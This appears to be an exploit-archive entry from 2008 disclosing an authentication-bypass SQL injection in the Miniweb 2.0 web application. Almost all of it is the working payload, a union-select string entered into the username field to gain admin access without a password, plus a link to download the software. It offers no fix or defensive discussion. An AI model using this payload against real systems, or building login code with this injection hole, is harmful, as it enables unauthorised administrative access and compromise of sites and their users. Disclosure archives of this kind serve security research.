id: 4547
date: 12/28/2008
title: Miniweb 2.0 (Auth Bypass) SQL Injection Vulnerability
author: bizzit
cves: 

=====================================================
Miniweb 2.0 (Auth Bypass) SQL Injection Vulnerability
=====================================================


##############################################################################
# Miniweb 2.0 Admin bypass
##############################################################################
# Type:
# 'union select 1#
# in the username field and press login, you are admin!
#
# download: http://www.miniweb2.com/
##############################################################################
# Found by bizzit
##############################################################################



#  0day.today [2023-03-22]  #